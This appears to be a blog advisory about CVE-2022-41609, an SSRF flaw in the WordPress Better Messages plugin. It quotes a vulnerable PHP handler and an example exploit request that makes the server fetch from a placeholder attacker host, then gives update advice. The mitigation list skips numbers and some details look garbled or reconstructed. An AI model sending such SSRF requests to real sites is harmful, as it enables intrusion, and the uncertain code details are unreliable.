Attention, WordPress users! A newly discovered vulnerability (CVE-2022-41609) has been identified in the popular Better Messages plugin, which potentially exposes your site to unauthorized access and data exfiltration. If you're using version 1.9.10.68 or earlier, your site might be at risk of being exploited by hackers.
In this post, we'll dive deep into the issue, discussing the details of how the vulnerability works, the threats it poses, and essential steps you can take to protect your site. We'll also provide code snippets, links to original references, and information on how the exploit can be carried out.
Overview of Vulnerability
The Server-Side Request Forgery (SSRF) vulnerability in Better Messages plugin 1.9.10.68 on WordPress allows attackers to bypass the authentication mechanism and initiate unauthorized requests to the site's internal network systems. As a result, sensitive information, such as database credentials, API keys, and other critical configuration data, can be leaked.
Details of the Exploit
When analyzing the vulnerability, security researchers found that the Better Messages plugin has a "feature" that allows site administrators to make server-side HTTP requests to arbitrary URLs.
Specifically, the "_bm_ajax_" function in the custom-ajax.php file handles these requests
function _bm_ajax_() {
// ... code ...
$url = $_REQUEST['_url'];
$response = wp_remote_get($url);
// ... code ...
}
By examining the code snippet, one can notice the lack of adequate input validation and sanitization, making it possible for an attacker to craft malicious URLs and execute unauthorized server-side requests.
For example, an attacker could target a vulnerable server by sending the following HTTP request
GET /wp-admin/admin-ajax.php?action=_bm_ajax_&do_action=_test_request_&action_id=1111&_url=http://attackers-site.com/evil-script.php HTTP/1.1
Host: vulnerable-wordpress-site.com
User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:97.) Gecko/20100101 Firefox/97.
Accept: */*
Referer: https://vulnerable-wordpress-site.com/wp-admin
Upon successful exploitation, the attacker could gain access to sensitive assets or perform arbitrary actions on the site without proper authorization.
Original References
For a more comprehensive and technical explanation of the CVE-2022-41609 vulnerability, check out these links:
Vulnerability report on the developer's website
https://better-messages-plugin.io/security/cve-2022-41609
Official CVE report by the Mitre Corporation
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41609
Mitigation and Remediation
If your WordPress site is running the Better Messages plugin version 1.9.10.68 or earlier, you should immediately take the following steps to secure your site:
1. Update the Better Messages plugin to version 1.9.10.69 or higher, as the vulnerability has been addressed in this release.
Enforce strict access controls and authentication processes to further secure your site.
4. Keep your WordPress installation, themes, and other plugins regularly updated to minimize the risk of future vulnerabilities.
Stay vigilant, WordPress users! We hope that this article has helped you understand the CVE-2022-41609 vulnerability in the Better Messages plugin and how to take actions to keep your site safe. Remember always to be proactive with your site's security and stay up-to-date with the latest vulnerabilities and patches. Stay tuned for more security updates and tips!
Timeline
Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC